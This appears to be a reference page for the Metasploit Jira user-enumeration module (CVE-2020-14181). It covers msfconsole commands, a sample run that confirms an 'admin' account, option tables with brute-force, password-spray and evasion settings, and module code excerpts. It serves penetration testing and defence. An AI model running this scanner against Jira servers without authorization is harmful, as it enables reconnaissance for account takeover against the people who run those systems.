Jira Users Enumeration - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/http/jira_user_enum metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Jira Users Enumeration
Module: auxiliary/scanner/http/jira_user_enum
Source code: modules/auxiliary/scanner/http/jira_user_enum.rb
Disclosure date: 2020-08-16
Last modification time: 2021-09-15 12:35:34 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2020-14181

This module exploits an information disclosure vulnerability that allows an unauthenticated user to enumerate users in the /ViewUserHover.jspa endpoint. This only affects Jira versions < 7.13.16, 8.0.0 ≤ version < 8.5.7, 8.6.0 ≤ version < 8.11.1 Discovered by Mikhail Klyuchnikov @mn1 This module has been tested on versions 8.4.1, 8.5.6, 8.10.1, 8.11.0

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/http/jira_user_enum
msf auxiliary(jira_user_enum) > show options
    ... show and set options ...
msf auxiliary(jira_user_enum) > set RHOSTS ip-range
msf auxiliary(jira_user_enum) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(jira_user_enum) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(jira_user_enum) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(jira_user_enum) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

Knowledge Base


Vulnerable Application


Jira Jira is team managment software for agile teams.

This module has been tested successfully on:

  • Jira version 8.4.1 on Ubuntu Linux.
  • Jira version 8.4.1 on Kali Linux.
  • Jira version 8.5.6 on Ubuntu Linux.
  • Jira version 8.10.1 on Ubuntu Linux.
  • Jira version 8.11.0 on Ubuntu Linux

Installers:

Description

The module exploits an information disclosure vulnerability to allow an unauthenticated user to enumerate /ViewUserHover.jspa endpoint. This only affects Jira versions < 7.13.16, 8.0.0 ≤ version < 8.5.7, 8.6.0 ≤ version < 8.11.1 Discovered by Mikhail Klyuchnikov @mn1 https://twitter.com/ptswarm/status/1318914772918767619

Verification Steps


  1. Start msfconsole
  2. Do: use auxiliary/scanner/http/jira_user_enum
  3. Do: set rhosts [IP]
  4. Do: set SSL true
  5. Do: set RPORT 443
  6. Do: `set USERNAME <username to test>
  7. Do: run
  8. You should find out if the user exists or not

Options


  • BRUTEFORCE_SPEED - How fast to bruteforce, from 0 to 5
  • RHOSTS - The Target host(s)
  • RPORT - Remote port hosting the Jira Application
  • TAREGETURI - Path to Jira install on the webserver
  • USERNAME - single username to attempt to enumerate
  • USER_FILE - File of usernames to attempt to enumerate

Scenarios


  msf6 > use auxiliary/scanner/http/jira_enum_users 
  msf6 auxiliary(scanner/http/jira_enum_users) > set rhosts 192.168.0.101
  rhosts => 192.168.0.101
  msf6 auxiliary(scanner/http/jira_enum_users) > set USERNAME admin
  msf6 auxiliary(scanner/http/jira_enum_users) > run

  [*] Begin enumerating users at 192.168.0.101/secure/ViewUserHover.jspa?username=
  [*] checking user admin
  [+] 'User exists: admin'
  [*] Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed
  msf6 auxiliary(scanner/http/jira_enum_users) > creds
  Credentials
  ===========

  host           origin         service         public   private  realm  private_type  JtR Format
  ----           ------         -------         ------   -------  -----  ------------  ----------
  192.168.0.101  192.168.0.101  443/tcp (jira)  admin                                

Go back to menu.

Msfconsole Usage


Here is how the scanner/http/jira_user_enum auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/http/jira_user_enum

msf6 auxiliary(scanner/http/jira_user_enum) > show info

       Name: Jira Users Enumeration
     Module: auxiliary/scanner/http/jira_user_enum
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2020-08-16

Provided by:
  Brian Halbach
  Mikhail Klyuchnikov

Module side effects:
 ioc-in-logs

Module stability:
 crash-safe

Check supported:
  No

Basic options:
  Name              Current Setting  Required  Description
  ----              ---------------  --------  -----------
  BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
  DB_ALL_USERS      false            no        Add all users in the current database to the list
  DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
  Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT             80               yes       The target port (TCP)
  SSL               false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI         /                yes       Jira Path
  THREADS           1                yes       The number of concurrent threads (max one per host)
  USERNAME                           no        A specific username to authenticate as
  USER_FILE                          no        File containing usernames, one per line
  VERBOSE           true             yes       Whether to print output for all attempts
  VHOST                              no        HTTP server virtual host

Description:
  This module exploits an information disclosure vulnerability that 
  allows an unauthenticated user to enumerate users in the 
  /ViewUserHover.jspa endpoint. This only affects Jira versions < 
  7.13.16, 8.0.0 ��� version < 8.5.7, 8.6.0 ��� version < 8.11.1 
  Discovered by Mikhail Klyuchnikov @__mn1__ This module has been 
  tested on versions 8.4.1, 8.5.6, 8.10.1, 8.11.0

References:
  https://jira.atlassian.com/browse/JRASERVER-71560
  https://nvd.nist.gov/vuln/detail/CVE-2020-14181

Module Options


This is a complete list of options available in the scanner/http/jira_user_enum auxiliary module:

msf6 auxiliary(scanner/http/jira_user_enum) > show options

Module options (auxiliary/scanner/http/jira_user_enum):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT             80               yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI         /                yes       Jira Path
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
   VHOST                              no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the scanner/http/jira_user_enum auxiliary module:

msf6 auxiliary(scanner/http/jira_user_enum) > show advanced

Module advanced options (auxiliary/scanner/http/jira_user_enum):

   Name                  Current Setting                          Required  Description
   ----                  ---------------                          --------  -----------
   DOMAIN                WORKSTATION                              yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                     no        Conform to IIS, should work for most servers. Only set to false for non-
                                                                            IIS servers
   FingerprintCheck      true                                     no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                              no        HTTP connection and receive timeout
   HttpPassword                                                   no        The HTTP password to specify for authentication
   HttpRawHeaders                                                 no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                    no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                  no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                    no        Show HTTP headers only in HttpTrace
   HttpUsername                                                   no        The HTTP username to specify for authentication
   MaxGuessesPerService  0                                        no        Maximum number of credentials to try per service instance. If set to zer
                                                                            o or a non-number, this option will not be used.
   MaxGuessesPerUser     0                                        no        Maximum guesses for a particular username for the service instance. Note
                                                                             that users are considered unique among different services, so a user at
                                                                             10.1.1.1:22 is different from one at 10.2.2.2:22, and both will be trie
                                                                            d up to the MaxGuessesPerUser limit. If set to zero or a non-number, thi
                                                                            s option will not be used.
   MaxMinutesPerService  0                                        no        Maximum time in minutes to bruteforce the service instance. If set to ze
                                                                            ro or a non-number, this option will not be used.
   PASSWORD_SPRAY        false                                    yes       Reverse the credential pairing order. For each password, attempt every p
                                                                            ossible user.
   REMOVE_PASS_FILE      false                                    yes       Automatically delete the PASS_FILE on module completion
   REMOVE_USERPASS_FILE  false                                    yes       Automatically delete the USERPASS_FILE on module completion
   REMOVE_USER_FILE      false                                    yes       Automatically delete the USER_FILE on module completion
   SSLVersion            Auto                                     yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-
                                                                            negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress          true                                     yes       Display progress messages during a scan
   ShowProgressPercent   10                                       yes       The interval in percent that progress should be shown
   TRANSITION_DELAY      0                                        no        Amount of time (in minutes) to delay before transitioning to the next us
                                                                            er in the array (or password when PASSWORD_SPRAY=true)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Wind  no        The User-Agent header to use for all requests
                         ows NT 5.1)
   WORKSPACE                                                      no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/http/jira_user_enum module can do:

msf6 auxiliary(scanner/http/jira_user_enum) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/http/jira_user_enum auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/http/jira_user_enum) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache
                                                            )
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-n
                                                            ormal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

No Response From Server


Here is a relevant code snippet related to the "No Response From Server" error message:

59:	      'vars_get' => { 'username' => user },
60:	      'headers' => { 'Connection' => 'Close' }
61:	    )
62:	
63:	    unless res
64:	      print_error('No Response From Server')
65:	      return :abort
66:	    end
67:	
68:	    if res.body.include?('User does not exist')
69:	      print_bad("User '#{user}' does not exist")

User '<USER>' does not exist


Here is a relevant code snippet related to the "User '<USER>' does not exist" error message:

64:	      print_error('No Response From Server')
65:	      return :abort
66:	    end
67:	
68:	    if res.body.include?('User does not exist')
69:	      print_bad("User '#{user}' does not exist")
70:	    elsif res.body.include?('<a id="avatar-full-name-link"') # this works for 8.4.1 not sure about other versions
71:	      connection_details = {
72:	        module_fullname: fullname,
73:	        username: user,
74:	        workspace_id: myworkspace_id,

<FULL_URI> - No users found.


Here is a relevant code snippet related to the "<FULL_URI> - No users found." error message:

90:	
91:	      do_user_enum(user)
92:	    end
93:	
94:	    if @users_found.empty?
95:	      print_status("#{full_uri} - No users found.")
96:	    else
97:	      print_good("#{@users_found.length} Users found: #{@users_found.sort.join(', ')}")
98:	    end
99:	  end
100:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Brian Halbach
  • Mikhail Klyuchnikov

Version


This page has been produced using Metasploit Framework version 6.1.36-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.